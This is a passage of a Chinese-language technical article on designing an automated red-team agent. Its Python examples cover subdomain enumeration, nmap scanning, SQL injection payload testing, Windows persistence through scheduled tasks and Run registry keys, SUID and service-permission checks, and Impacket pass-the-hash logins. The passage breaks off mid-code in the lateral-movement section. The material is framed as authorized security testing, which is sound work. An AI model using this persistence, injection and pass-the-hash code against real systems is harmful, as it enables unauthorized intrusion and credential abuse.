深入‘网络安全红队 Agent’:模拟攻击路径寻找企业内网资产漏洞并生成修复建议

各位同仁、技术爱好者,大家好!

今天,我们齐聚一堂,共同探讨一个前沿且极具挑战性的话题——深入‘网络安全红队 Agent’:如何模拟攻击路径,寻找企业内网资产漏洞,并生成修复建议。在这个数字化飞速发展的时代,企业面临的威胁日益复杂,传统的被动防御已经不足以应对。红队演练作为一种主动、对抗性的安全评估方式,其价值日益凸显。而将红队的部分能力自动化、智能化,构建一个“红队 Agent”,正是我们提升安全效能、降低评估成本、实现持续性安全验证的未来方向。

我将从一个编程专家的视角,为大家剖析这个 Agent 的设计理念、关键技术、实现细节,并辅以大量的代码示例,希望能为大家带来一些启发。

深入理解红队与自动化 Agent 的价值

首先,我们明确“红队”的本质:它模拟真实的攻击者,以目标为导向,通过各种技术手段,渗透到企业的网络深处,发现安全漏洞和薄弱环节。红队的目标不仅仅是发现单个漏洞,更重要的是揭示完整的攻击链条,即攻击者如何从外部突破,逐步横向移动,最终达成其恶意目的。

“红队 Agent”的出现,旨在将红队演练中那些重复性高、逻辑清晰、可编程实现的任务自动化。它不是要取代人类红队专家,而是作为他们的强大辅助工具,甚至在某些场景下,能够独立完成持续性的、大规模的、甚至在人类难以察觉的微观层面进行安全评估。

Agent 的核心价值在于:

  1. 效率提升: 自动化执行侦察、扫描、漏洞利用等任务,大幅缩短评估周期。
  2. 覆盖度与深度: 能够以更广的范围和更细致的粒度对目标进行探测,发现人类容易遗漏的盲区。
  3. 持续性验证: 实现对企业安全状态的常态化监测,及时发现新出现的漏洞和配置偏差。
  4. 攻击路径可视化: 清晰地呈现攻击者可能利用的每一步骤,帮助企业理解风险的连贯性。
  5. 量化安全风险: 通过模拟攻击的成功率和对业务影响的评估,为企业提供更具操作性的风险洞察。

红队 Agent 的攻击生命周期与模块设计

一个完整的红队 Agent 需要模拟攻击者从最初的侦察到最终达成目标(如数据窃取、系统控制)的全过程。我们可以将其攻击生命周期划分为以下几个主要阶段,并据此设计 Agent 的模块。

| 攻击阶段 | 主要任务 | Agent 模块功能

侦察模块 (Reconnaissance Module)

侦察是攻击链条的第一步,也是至关重要的一步。Agent 需要收集尽可能多的关于目标企业的信息,包括其网络边界、IP 地址段、域名信息、公开服务、员工信息、技术栈等。

1. 外部侦察 (OSINT – Open Source Intelligence)

Agent 首先从公开渠道收集信息。

目标:

  • 域名信息: 注册信息、DNS 记录 (A, MX, NS, SOA, TXT)。
  • IP 地址范围: 关联的 IP 地址、CIDR 块、ASN 信息。
  • 子域名: 发现被遗忘或未监控的资产。
  • 公开端口与服务: 暴露在互联网上的服务。
  • 员工信息: 电子邮件地址、社交媒体资料(用于钓鱼攻击准备)。
  • 技术栈: Web 服务器类型、框架、CMS 版本。
  • 代码泄露: GitHub, Pastebin 等平台上的敏感信息。

Agent 实现方式:
Agent 可以集成各类 OSINT 工具的 API 或通过网页抓取技术实现。

代码示例:Python 进行域名信息和子域名枚举

import requests
import dns.resolver
import json
from concurrent.futures import ThreadPoolExecutor

class OSINT_Agent:
    def __init__(self, target_domain):
        self.target_domain = target_domain
        self.subdomains = set()
        self.ips = set()
        self.mx_records = []
        self.ns_records = []

    def get_dns_records(self):
        """
        获取主要的DNS记录 (A, MX, NS)
        """
        print(f"[*] Querying DNS records for {self.target_domain}...")
        try:
            # A records
            a_records = dns.resolver.resolve(self.target_domain, 'A')
            for a in a_records:
                self.ips.add(str(a))
                print(f"    [+] A Record: {str(a)}")
        except dns.resolver.NoAnswer:
            print(f"    [-] No A records found for {self.target_domain}")
        except Exception as e:
            print(f"    [-] Error querying A records: {e}")

        try:
            # MX records
            mx_records = dns.resolver.resolve(self.target_domain, 'MX')
            for mx in mx_records:
                self.mx_records.append(str(mx.exchange))
                print(f"    [+] MX Record: {str(mx.exchange)}")
        except dns.resolver.NoAnswer:
            print(f"    [-] No MX records found for {self.target_domain}")
        except Exception as e:
            print(f"    [-] Error querying MX records: {e}")

        try:
            # NS records
            ns_records = dns.resolver.resolve(self.target_domain, 'NS')
            for ns in ns_records:
                self.ns_records.append(str(ns))
                print(f"    [+] NS Record: {str(ns)}")
        except dns.resolver.NoAnswer:
            print(f"    [-] No NS records found for {self.target_domain}")
        except Exception as e:
            print(f"    [-] Error querying NS records: {e}")

    def find_subdomains_bruteforce(self, wordlist_path="subdomains-top1m.txt", num_threads=10):
        """
        通过暴力破解方式枚举子域名
        """
        print(f"[*] Brute-forcing subdomains for {self.target_domain} using {wordlist_path}...")
        try:
            with open(wordlist_path, 'r') as f:
                wordlist = [line.strip() for line in f if line.strip()]

            def check_subdomain(sub):
                full_domain = f"{sub}.{self.target_domain}"
                try:
                    dns.resolver.resolve(full_domain, 'A')
                    print(f"    [+] Found subdomain: {full_domain}")
                    self.subdomains.add(full_domain)
                except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.Timeout):
                    pass # Not found or timeout
                except Exception as e:
                    # print(f"    [-] Error checking {full_domain}: {e}")
                    pass # Ignore other errors for now

            with ThreadPoolExecutor(max_workers=num_threads) as executor:
                executor.map(check_subdomain, wordlist)

        except FileNotFoundError:
            print(f"    [-] Wordlist not found at {wordlist_path}")
        except Exception as e:
            print(f"    [-] Error during subdomain brute-force: {e}")

    def find_subdomains_certsh(self):
        """
        通过 cert.sh API 查找子域名
        """
        print(f"[*] Querying cert.sh for subdomains for {self.target_domain}...")
        url = f"https://crt.sh/?q=%.{self.target_domain}&output=json"
        try:
            response = requests.get(url, timeout=10)
            response.raise_for_status() # Raise an exception for HTTP errors
            data = response.json()
            for entry in data:
                name_value = entry.get('name_value', '')
                # cert.sh might return multiple domains separated by newline
                domains = name_value.split('n')
                for domain in domains:
                    if domain.endswith(self.target_domain) and domain != self.target_domain:
                        self.subdomains.add(domain)
                        print(f"    [+] Found subdomain (cert.sh): {domain}")
        except requests.exceptions.RequestException as e:
            print(f"    [-] Error querying cert.sh: {e}")
        except json.JSONDecodeError:
            print(f"    [-] Failed to decode JSON from cert.sh response.")
        except Exception as e:
            print(f"    [-] An unexpected error occurred with cert.sh: {e}")

    def run(self):
        self.get_dns_records()
        self.find_subdomains_certsh()
        # self.find_subdomains_bruteforce() # 如果需要,可以启用暴力破解,但会耗时

        print("n--- OSINT Summary ---")
        print(f"Target Domain: {self.target_domain}")
        print(f"Associated IPs: {', '.join(self.ips) if self.ips else 'N/A'}")
        print(f"MX Records: {', '.join(self.mx_records) if self.mx_records else 'N/A'}")
        print(f"NS Records: {', '.join(self.ns_records) if self.ns_records else 'N/A'}")
        print(f"Discovered Subdomains ({len(self.subdomains)}):")
        for sub in sorted(list(self.subdomains)):
            print(f"  - {sub}")
        print("---------------------")

if __name__ == "__main__":
    target = "example.com" # 替换为实际目标域名
    osint_agent = OSINT_Agent(target)
    osint_agent.run()

说明:

  • 上述代码利用 dns.resolver 库进行 DNS 记录查询。
  • find_subdomains_bruteforce 模拟了子域名暴力破解,需要一个子域名词典文件。
  • find_subdomains_certsh 利用 crt.sh 提供的公共证书透明度日志 API,被动地发现子域名,这种方式更为隐蔽和高效。
  • Agent 可以将这些信息结构化存储,为后续阶段提供数据。

2. 内部侦察 (Internal Reconnaissance)

一旦 Agent 获得了初始访问权限(可能是通过外部漏洞或钓鱼),它将进入内网进行更深入的侦察。

目标:

  • 网络拓扑: 发现内部网络段、VLAN、防火墙规则。
  • 活动主机: 识别网络中所有活跃的设备。
  • 开放端口与服务: 详细的服务版本、配置信息。
  • 用户与组: 域用户、本地用户、组信息、权限分配。
  • 共享资源: SMB 共享、NFS 共享、Git 仓库等。
  • 域控制器信息: DC 地址、域信任关系。
  • Web 应用: 内网 Web 服务、管理界面。
  • 安全设备: 识别防火墙、IDS/IPS、EDR 等。

Agent 实现方式:
Agent 将执行以下操作:

  • 端口扫描: 发现开放的服务。
  • 服务枚举: 识别服务类型和版本。
  • 操作系统指纹识别: 确定主机操作系统。
  • SMB/LDAP 枚举: 收集域和用户信息。
  • 网络流量监听: (在某些受限场景下) 捕获敏感信息。

代码示例:Python 集成 Nmap 进行内网端口扫描和系统识别

Agent 通常不会直接运行 Nmap 二进制,而是通过 Python 库 python-nmap 或者 subprocess 模块调用 Nmap 命令,并解析其 XML 输出。

import nmap
import subprocess
import json
import re

class InternalRecon_Agent:
    def __init__(self, target_ips_or_ranges):
        self.target_ips = target_ips_or_ranges
        self.discovered_hosts = []
        self.nm = nmap.PortScanner() # Initialize nmap scanner

    def run_nmap_scan(self, ip_range):
        """
        执行Nmap扫描并解析结果
        """
        print(f"[*] Running Nmap scan on {ip_range}...")
        try:
            # -sS: SYN scan (stealthy)
            # -sV: Service version detection
            # -O: OS detection
            # -p 1-65535: Scan all ports (can be slow, adjust as needed)
            # --script=vuln: Run common vulnerability scripts (advanced, can be noisy)
            # -T4: Aggressive timing (faster, but might be detected)
            # -oX -: Output in XML to stdout
            nmap_command = [
                'nmap', '-sS', '-sV', '-O', '-p', '1-1024', # Example: scan common ports
                '--min-rate', '100', # min-rate for stealthier scans, adjust
                '-T4',
                '-oX', '-', ip_range
            ]

            # Execute Nmap via subprocess and capture XML output
            process = subprocess.run(nmap_command, capture_output=True, text=True, check=True)
            xml_output = process.stdout

            # Parse XML output using nmap.PortScanner's built-in parser
            # nmap.PortScanner().analyse_nmap_xml_scan(xml_output) is for reading existing XML
            # For direct execution and parsing, it's often easier to use the python-nmap wrapper
            # Let's re-do this using python-nmap's run method which is cleaner.

            # Using python-nmap's built-in run method
            self.nm.scan(hosts=ip_range, arguments='-sS -sV -O -p 1-1024 -T4 --min-rate 100')

            for host in self.nm.all_hosts():
                host_info = {
                    'ip': host,
                    'hostname': self.nm[host]['hostnames'][0]['name'] if self.nm[host]['hostnames'] else '',
                    'state': self.nm[host]['status']['state'],
                    'os': '',
                    'ports': []
                }

                # OS detection
                if 'osmatch' in self.nm[host]:
                    for osmatch in self.nm[host]['osmatch']:
                        if osmatch['accuracy'] >= '90': # Only take high confidence matches
                            host_info['os'] = osmatch['name']
                            break

                # Port details
                if 'tcp' in self.nm[host]:
                    for port in self.nm[host]['tcp']:
                        port_info = self.nm[host]['tcp'][port]
                        if port_info['state'] == 'open':
                            host_info['ports'].append({
                                'port_id': port,
                                'state': port_info['state'],
                                'service_name': port_info['name'],
                                'product': port_info.get('product', ''),
                                'version': port_info.get('version', ''),
                                'extrainfo': port_info.get('extrainfo', '')
                            })
                self.discovered_hosts.append(host_info)
                print(f"    [+] Discovered host: {host_info['ip']} ({host_info['hostname']}) - OS: {host_info['os']}")
                for p in host_info['ports']:
                    print(f"        - Port {p['port_id']}/{p['service_name']} ({p['product']} {p['version']})")

        except nmap.PortScannerError as e:
            print(f"    [-] Nmap scan error for {ip_range}: {e}")
        except subprocess.CalledProcessError as e:
            print(f"    [-] Nmap command failed for {ip_range}: {e.stderr}")
        except Exception as e:
            print(f"    [-] An unexpected error occurred during Nmap scan for {ip_range}: {e}")

    def enumerate_smb(self, ip):
        """
        枚举SMB共享和用户
        使用Impacket的smbclient.py或enum4linux等工具的原理
        """
        print(f"[*] Enumerating SMB on {ip}...")
        # Agent would use a tool like 'smbclient' or 'enum4linux'
        # For demonstration, we'll simulate a simple check.
        try:
            # Example: Check for anonymous SMB login
            # command = ['smbclient', '-L', ip, '-N'] # -N for no password
            # process = subprocess.run(command, capture_output=True, text=True, timeout=10)
            # if "Anonymous login successful" in process.stdout:
            #     print(f"    [+] Anonymous SMB login successful on {ip}. Shares:n{process.stdout}")
            # else:
            #     print(f"    [-] Anonymous SMB login failed on {ip}.")

            # A more robust agent would use Impacket library directly
            # For simplicity, we'll just check if port 445 is open from nmap results
            host_info = next((h for h in self.discovered_hosts if h['ip'] == ip), None)
            if host_info:
                if any(p['port_id'] == '445' and p['state'] == 'open' for p in host_info['ports']):
                    print(f"    [+] SMB (port 445) is open on {ip}. Further enumeration needed.")
                    # Here, Agent would queue tasks for tools like:
                    # - Impacket's `smbclient.py` to list shares
                    # - Impacket's `rpcdump.py` to enumerate users/groups via RPC
                    # - `CrackMapExec` or `enum4linux` for more advanced enumeration
                else:
                    print(f"    [-] SMB (port 445) not open on {ip}.")
            else:
                print(f"    [-] Host {ip} not found in discovered hosts.")

        except Exception as e:
            print(f"    [-] Error enumerating SMB on {ip}: {e}")

    def enumerate_ldap_ad(self, ip):
        """
        枚举LDAP/AD信息
        """
        print(f"[*] Enumerating LDAP/AD on {ip}...")
        host_info = next((h for h in self.discovered_hosts if h['ip'] == ip), None)
        if host_info and any(p['port_id'] in ['389', '636'] and p['state'] == 'open' for p in host_info['ports']):
            print(f"    [+] LDAP (port 389/636) is open on {ip}. Further enumeration needed.")
            # Agent would queue tasks for tools like:
            # - Impacket's `GetUserSPNs.py` to request Service Principal Names
            # - Impacket's `GetADUsers.py` to list domain users
            # - `BloodHound.py` to collect AD data for graph analysis
        else:
            print(f"    [-] LDAP (port 389/636) not open on {ip}.")

    def run(self):
        for ip_range in self.target_ips:
            self.run_nmap_scan(ip_range)

        # After initial scan, iterate through discovered hosts for deeper enumeration
        print("n--- Deep Enumeration on Discovered Hosts ---")
        for host in self.discovered_hosts:
            if host['state'] == 'up':
                print(f"nProcessing host: {host['ip']}")
                self.enumerate_smb(host['ip'])
                self.enumerate_ldap_ad(host['ip'])
                # Add more specific service enumeration functions here (e.g., HTTP, SSH, SQL)

        print("n--- Internal Recon Summary ---")
        print(f"Discovered {len(self.discovered_hosts)} active hosts.")
        print(json.dumps(self.discovered_hosts, indent=2))
        print("----------------------------")

if __name__ == "__main__":
    # 替换为实际的内网IP地址或范围
    # 注意: 在实际环境中执行Nmap扫描可能引起告警或被防火墙阻止。
    # 确保在授权的测试环境下进行。
    internal_target_ips = ["192.168.1.0/24", "10.0.0.10"] 
    internal_recon_agent = InternalRecon_Agent(internal_target_ips)
    internal_recon_agent.run()

说明:

  • Agent 可以通过 python-nmap 库执行 Nmap 扫描并解析结果。
  • 对于 SMB、LDAP 等服务的更深层枚举,Agent 会根据 Nmap 发现的开放端口,调用相应的模块或外部工具(如 Impacket 库的脚本),收集用户、组、共享、域信任等信息。
  • 这些收集到的信息是构建攻击路径图的关键数据。

攻击模块 (Attack Module)

在侦察阶段收集到足够的信息后,Agent 将尝试利用这些信息来获得初步访问、提升权限、横向移动。

1. 初步访问 (Initial Access)

这是攻击者进入目标网络的第一个立足点。

Agent 策略:

  • 钓鱼攻击模拟: 发送恶意邮件,诱导用户点击链接或打开附件。
  • Web 应用漏洞利用: 扫描并利用如 SQL 注入、XSS、文件上传、认证绕过等 Web 漏洞。
  • 暴露服务利用: 针对 VPN、RDP、SSH 等暴露在外部的服务进行弱口令尝试或已知漏洞利用。
  • 客户端漏洞利用: 针对浏览器、PDF 阅读器等客户端软件的漏洞。

代码示例:Python 模拟简单的 Web 应用漏洞扫描 (SQL 注入)

import requests

class WebVulnerabilityScanner:
    def __init__(self, target_url):
        self.target_url = target_url
        self.vulnerabilities = []

    def test_sql_injection(self, payload_file="sql_payloads.txt"):
        """
        模拟简单的SQL注入测试
        """
        print(f"[*] Testing SQL Injection for {self.target_url}...")
        try:
            with open(payload_file, 'r') as f:
                payloads = [line.strip() for line in f if line.strip()]
        except FileNotFoundError:
            print(f"    [-] SQL Injection payload file not found: {payload_file}")
            return

        # 假设目标URL有一个参数,例如: http://example.com/index.php?id=1
        # 需要 Agent 智能识别参数,这里简化为假定一个参数
        if '?' not in self.target_url:
            print("    [-] Target URL does not seem to have parameters for SQL injection testing.")
            return

        base_url, base_params_str = self.target_url.split('?', 1)
        base_params = {k: v for k, v in [p.split('=', 1) for p in base_params_str.split('&')]}

        test_param = list(base_params.keys())[0] # Take the first parameter for testing

        for payload in payloads:
            test_params = base_params.copy()
            test_params[test_param] += payload # Append payload to existing parameter value

            try:
                response = requests.get(base_url, params=test_params, timeout=5)
                # 常见的SQL错误信息或延迟注入的判断逻辑
                if "SQL syntax" in response.text or 
                   "mysql_fetch_array()" in response.text or 
                   "You have an error in your SQL syntax" in response.text or 
                   "ORA-" in response.text: # Oracle error
                    vuln_info = {
                        'type': 'SQL Injection',
                        'url': response.url,
                        'payload': payload,
                        'description': 'Potential SQL Injection vulnerability detected.'
                    }
                    self.vulnerabilities.append(vuln_info)
                    print(f"    [!] Detected SQL Injection: {vuln_info['url']} with payload '{payload}'")
                    return # Stop after first detection

                # Time-based blind SQLi check (simplified)
                # If 'sleep(5)' causes a significant delay, it's a potential vulnerability
                # This requires more advanced timing analysis.

            except requests.exceptions.RequestException as e:
                # print(f"    [-] Request error for {base_url} with payload '{payload}': {e}")
                pass
            except Exception as e:
                # print(f"    [-] An unexpected error occurred: {e}")
                pass

        print(f"    [+] No obvious SQL Injection found for {self.target_url}.")

    def run(self):
        self.test_sql_injection()
        print("n--- Web Vulnerability Scan Summary ---")
        if self.vulnerabilities:
            for vuln in self.vulnerabilities:
                print(f"  - Type: {vuln['type']}")
                print(f"    URL: {vuln['url']}")
                print(f"    Payload: {vuln['payload']}")
                print(f"    Description: {vuln['description']}")
        else:
            print("  No web vulnerabilities detected.")
        print("------------------------------------")

if __name__ == "__main__":
    # 创建一个简单的SQL注入payloads文件
    with open("sql_payloads.txt", "w") as f:
        f.write("' OR 1=1 --n")
        f.write("' OR '1'='1n")
        f.write("admin' --n")
        f.write("'n")
        f.write("')n")

    # 替换为实际的Web应用URL,需要有可供测试的参数
    # 示例: target_web_app_url = "http://testphp.vulnweb.com/listproducts.php?cat=1"
    # 或者一个内部 Web 应用: "http://192.168.1.100/search.php?query=test"
    target_web_app_url = "http://localhost/vulnerable_app/index.php?id=1" # 假设一个本地易受攻击的Web应用
    scanner = WebVulnerabilityScanner(target_web_app_url)
    scanner.run()

说明:

  • Agent 需要一个预定义的 Payload 列表,或者能够根据目标服务动态生成 Payload。
  • 通过分析 HTTP 响应(错误信息、状态码、响应时间等)来判断漏洞是否存在。
  • 更高级的 Agent 会集成 sqlmapBurp Suite 的扫描能力。

2. 持久化 (Persistence)

一旦 Agent 获得立足点,它会尝试建立持久化机制,以防被发现或系统重启后失去访问。

Agent 策略:

  • 创建后门账户: 在系统上创建新的高权限用户。
  • 注册服务/计划任务: 创建恶意服务或计划任务,使其在系统启动时自动运行。
  • 修改启动项: 注入恶意代码到注册表启动项或启动脚本。
  • DLL 劫持: 替换或修改合法程序的 DLL 文件。

代码示例:Python (通过 PowerShell) 创建 Windows 计划任务实现持久化

import subprocess

class PersistenceAgent:
    def __init__(self, target_ip, username, password):
        self.target_ip = target_ip
        self.username = username
        self.password = password
        # For remote execution, we'd typically use psexec-like tools or WinRM
        # Here, we simulate local execution for simplicity.
        # In a real agent, this would be executed on the compromised host.

    def create_scheduled_task(self, task_name, command_to_run, schedule_type="DAILY", interval=1):
        """
        在Windows上创建计划任务
        command_to_run: 例如 "C:\Windows\System32\calc.exe"
        """
        print(f"[*] Attempting to create scheduled task '{task_name}' on target...")
        # PowerShell command to create a scheduled task
        # This assumes we have command execution capabilities on the target.
        powershell_command = f"""
        $action = New-ScheduledTaskAction -Execute '{command_to_run}'
        $trigger = New-ScheduledTaskTrigger -{schedule_type} -At '09:00' -Interval {interval}
        Register-ScheduledTask -TaskName '{task_name}' -Action $action -Trigger $trigger -User 'SYSTEM' -Force
        """

        try:
            # Execute PowerShell command remotely (e.g., via WinRM or psexec if credentials available)
            # For demonstration, we'll run it locally.
            # In a real agent, this would be encapsulated in a remote execution module.
            result = subprocess.run(
                ["powershell.exe", "-Command", powershell_command],
                capture_output=True, text=True, check=True, timeout=30
            )
            print(f"    [+] Scheduled task '{task_name}' created successfully.")
            # print(result.stdout)
        except subprocess.CalledProcessError as e:
            print(f"    [-] Failed to create scheduled task '{task_name}': {e.stderr}")
        except Exception as e:
            print(f"    [-] An error occurred: {e}")

    def add_startup_registry_key(self, key_name, command_path):
        """
        在Windows注册表Run键中添加启动项
        """
        print(f"[*] Attempting to add startup registry key '{key_name}' on target...")
        # Path for current user: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
        # Path for all users: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
        # Using HKLM requires administrator privileges.
        powershell_command = f"""
        Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "{key_name}" -Value "{command_path}" -Force
        """
        try:
            result = subprocess.run(
                ["powershell.exe", "-Command", powershell_command],
                capture_output=True, text=True, check=True, timeout=30
            )
            print(f"    [+] Startup registry key '{key_name}' added successfully.")
            # print(result.stdout)
        except subprocess.CalledProcessError as e:
            print(f"    [-] Failed to add startup registry key '{key_name}': {e.stderr}")
        except Exception as e:
            print(f"    [-] An error occurred: {e}")

    def run(self):
        # Example: Create a task to run calc.exe daily
        self.create_scheduled_task("AgentHeartbeat", "C:\Windows\System32\calc.exe")
        # Example: Add a startup item to run notepad.exe
        self.add_startup_registry_key("AgentNotepad", "C:\Windows\System32\notepad.exe")

if __name__ == "__main__":
    # 假设Agent已经获得了目标机器的命令执行权限
    # 在真实场景中,这些操作会通过建立的C2通道进行远程执行
    persistence_agent = PersistenceAgent("127.0.0.1", "agent_user", "AgentPass123!")
    persistence_agent.run()

说明:

  • 此示例通过 subprocess 调用 powershell.exe 来执行 Windows 上的持久化操作。
  • 在实际的 Agent 中,这些命令会通过已建立的 C2 (Command and Control) 通道,在受控主机上远程执行。
  • Agent 需要根据目标操作系统和权限选择合适的持久化技术。

3. 权限提升 (Privilege Escalation)

获得初步访问后,Agent 通常以普通用户权限运行。权限提升的目标是获取更高权限(如 SYSTEMAdministratorroot)。

Agent 策略:

  • 内核漏洞利用: 发现并利用操作系统内核的已知漏洞。
  • 配置错误: 利用不安全的配置文件、不安全的 SUID/GUID 程序(Linux)、服务权限配置错误(Windows)。
  • 密码重用/凭据窃取: 窃取内存中的凭据(Mimikatz 模仿)、哈希值,尝试在其他系统上重用。
  • 未打补丁的软件: 利用运行在目标系统上的旧版本软件的漏洞。

代码示例:Python (概念性) 检查 Linux SUID/SGID 权限的程序

import os
import subprocess

class PrivilegeEscalationAgent:
    def __init__(self, target_ip):
        self.target_ip = target_ip
        self.potential_privesc_vectors = []

    def check_linux_suid_sgid(self):
        """
        检查具有SUID/SGID权限的程序,这些程序可能被滥用以提升权限。
        这部分代码在受控的Linux机器上执行。
        """
        print(f"[*] Checking for SUID/SGID binaries on {self.target_ip}...")
        # 查找所有者为root且设置了SUID位的可执行文件
        command = "find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null"

        try:
            result = subprocess.run(command, shell=True, capture_output=True, text=True, check=True, timeout=60)
            suid_files = result.stdout.strip().split('n')

            if suid_files:
                print(f"    [+] Found SUID binaries:")
                for f in suid_files:
                    if f:
                        print(f"        - {f}")
                        self.potential_privesc_vectors.append({
                            'type': 'SUID Binary Misconfiguration',
                            'path': f.split()[-1],
                            'description': 'Binary with SUID bit set, might be exploitable (e.g., GTFOBins).'
                        })
            else:
                print(f"    [-] No SUID binaries found.")

            # 查找所有者为root且设置了SGID位的可执行文件 (类似 SUIG)
            command_sgid = "find / -perm -2000 -type f -exec ls -la {} \; 2>/dev/null"
            result_sgid = subprocess.run(command_sgid, shell=True, capture_output=True, text=True, check=True, timeout=60)
            sgid_files = result_sgid.stdout.strip().split('n')
            if sgid_files:
                print(f"    [+] Found SGID binaries:")
                for f in sgid_files:
                    if f:
                        print(f"        - {f}")
                        self.potential_privesc_vectors.append({
                            'type': 'SGID Binary Misconfiguration',
                            'path': f.split()[-1],
                            'description': 'Binary with SGID bit set, might be exploitable.'
                        })

        except subprocess.CalledProcessError as e:
            print(f"    [-] Error checking SUID/SGID: {e.stderr}")
        except Exception as e:
            print(f"    [-] An unexpected error occurred: {e}")

    def check_windows_service_permissions(self):
        """
        检查Windows服务权限配置,寻找不安全的服务。
        这部分代码在受控的Windows机器上执行。
        """
        print(f"[*] Checking Windows service permissions on {self.target_ip}...")
        # 查找可以由非管理员用户修改的服务
        powershell_command = """
        Get-WmiObject win32_service | Where-Object { 
            (Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)").Access | Where-Object { 
                $_.IdentityReference -like "BUILTIN\Users" -or $_.IdentityReference -like "NT AUTHORITY\Authenticated Users" 
            }
        } | Select-Object Name, DisplayName, PathName, StartMode, State | ConvertTo-Json
        """
        try:
            result = subprocess.run(
                ["powershell.exe", "-Command", powershell_command],
                capture_output=True, text=True, check=False, timeout=60 # Set check=False to handle no results gracefully
            )

            if result.returncode == 0 and result.stdout.strip():
                services = json.loads(result.stdout)
                if services:
                    print(f"    [+] Found potentially insecure Windows services:")
                    # Convert to list if it's a single object
                    if not isinstance(services, list):
                        services = [services]
                    for service in services:
                        print(f"        - Service: {service['Name']}, Path: {service['PathName']}")
                        self.potential_privesc_vectors.append({
                            'type': 'Insecure Service Permissions',
                            'service_name': service['Name'],
                            'path': service['PathName'],
                            'description': 'Service with weak permissions, allowing unprivileged users to modify/restart.'
                        })
                else:
                    print(f"    [-] No insecure Windows service permissions found.")
            else:
                print(f"    [-] PowerShell command for service permissions failed or returned no data. Error: {result.stderr.strip()}")

        except json.JSONDecodeError:
            print(f"    [-] Failed to decode JSON from PowerShell output. Output: {result.stdout.strip()}")
        except Exception as e:
            print(f"    [-] An unexpected error occurred: {e}")

    def run(self, os_type="Linux"):
        if os_type == "Linux":
            self.check_linux_suid_sgid()
        elif os_type == "Windows":
            self.check_windows_service_permissions()
        else:
            print(f"    [-] Unsupported OS type for privilege escalation checks: {os_type}")

        print("n--- Privilege Escalation Scan Summary ---")
        if self.potential_privesc_vectors:
            for vec in self.potential_privesc_vectors:
                print(f"  - Type: {vec['type']}")
                print(f"    Details: {vec.get('path', vec.get('service_name', ''))}")
                print(f"    Description: {vec['description']}")
        else:
            print("  No obvious privilege escalation vectors found.")
        print("-----------------------------------------")

if __name__ == "__main__":
    # 假设 Agent 已经通过 C2 通道在目标机器上获得执行能力
    # 根据目标机器的操作系统选择执行
    privesc_agent_linux = PrivilegeEscalationAgent("192.168.1.10")
    privesc_agent_linux.run(os_type="Linux")

    print("n--- Simulating Windows PrivEsc Check ---n")
    privesc_agent_windows = PrivilegeEscalationAgent("192.168.1.20")
    privesc_agent_windows.run(os_type="Windows")

说明:

  • Linux 环境下,Agent 会查找具有 SUID/SGID 权限的二进制文件,这通常是常见的提权点。
  • Windows 环境下,Agent 会检查服务权限配置,寻找可由普通用户修改或重启的服务。
  • 更完整的 Agent 会集成 PowerSploitMimikatz 的功能,或利用 BloodHound 分析 Active Directory 的权限错配。

4. 横向移动 (Lateral Movement)

获得高权限后,Agent 将尝试在网络中进一步扩展控制范围,访问更多主机。

Agent 策略:

  • 凭据重用: 利用窃取的凭据(哈希、明文密码)尝试登录其他主机。
  • Pass-the-Hash/Ticket: 在不获取明文密码的情况下,利用 NTLM 哈希或 Kerberos 票据进行认证。
  • 服务利用: 利用 RDP、SSH、SMB、WinRM 等服务进行远程登录或命令执行。
  • 域信任滥用: 利用 Active Directory 的信任关系从一个域渗透到另一个域。

代码示例:Python (概念性) 利用 Impacket 库进行 Pass-the-Hash

Agent 不会自己实现所有协议,而是会调用成熟的库,如 Impacket。

# from impacket.examples.smbclient import SMBClient
# from impacket.examples.psexec import PSEXEC
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import samr
from impacket.dcerpc.v5 import transport
from impacket.ntlm import compute_nthash
import subprocess
import json

class LateralMovementAgent:
    def __init__(self, current_host_ip, compromised_credentials):
        self.current_host_ip = current_host_ip
        self.compromised_credentials = compromised_credentials # {'username': '...', 'password': '...', 'ntlm_hash': '...'}
        self.discovered_reachable_hosts = []
        self.potential_lateral_paths = []

    def scan_for_reachable_hosts(self, ip_range):
        """
        在当前网段扫描可达主机,基于Nmap的发现结果。
        简化:这里直接使用Nmap的Python wrapper。
        """
        print(f"[*] Scanning for reachable hosts in {ip_range} from {self.current_host_ip}...")
        nm = nmap.PortScanner()
        try:
            nm.scan(hosts=ip_range, arguments='-sn') # Ping scan for host discovery
            for host in nm.all_hosts():
                if nm[host]['status']['state'] == 'up' and host != self.current_host_ip:
                    self.discovered_reachable_hosts.append(host)
                    print(f"    [+] Discovered reachable host: {host}")
        except nmap.PortScannerError as e:
            print(f"    [-] Nmap scan error: {e}")
        except Exception as e:
            print(f"    [-] An error occurred during host discovery: {e}")

    def attempt_pth_smb(self, target_ip, username, ntlm_hash):
        """
        尝试使用Pass-the-Hash通过SMB连接到目标。
        使用Impacket库的原理。
        """
        print(f"[*] Attempting Pass-the-Hash (SMB) to {target_ip} with user {username}...")
        try:
            # SMBConnection supports NTLM hash for authentication
            smb_client = SMBConnection(target_ip, target_ip, None, 445)
            smb_client.login(username, '', domain='', lmhash='', nthash=ntlm_hash)
            print(f"    [+] Successfully authenticated to {target_ip} via SMB using Pass-the-Hash for user {username}!")
            self.potential_lateral_paths.append({
                'type': 'Pass-the-Hash (SMB)',
                'source_host': self.current_host_ip,
                'target_host': target_ip,
                'credential': username,
                'description': f"Achieved SMB access to {target_ip} with compromised NTLM hash."
            })
            # Here, Agent would then proceed to list shares, upload tools, execute commands via SMBExec/WMIExec
            smb_client.logoff()
        except Exception as e:
            print(f"    [-] Failed Pass-the-Hash (SMB) to {target_ip} for user {username}: {e}")

    def attempt_psexec(self, target_ip, username, password=None, ntlm_hash=None):
        """
        尝试使用PsExec (基于Impacket) 在目标上执行命令。
        """
        print(f"[*] Attempting PsExec to {target_ip} with user {username}...")
        # Impacket's psexec.py class would be used here.
        # For this demonstration, we'll simulate the outcome.

        # A real agent would instantiate PSEXEC or similar Impacket classes
        # and attempt command execution.
        # Example:
        # from impacket.examples.psexec import PSEXEC
        # psexec = PSEXEC('calc.exe', username, password, domain, hashes=ntlm_hash)
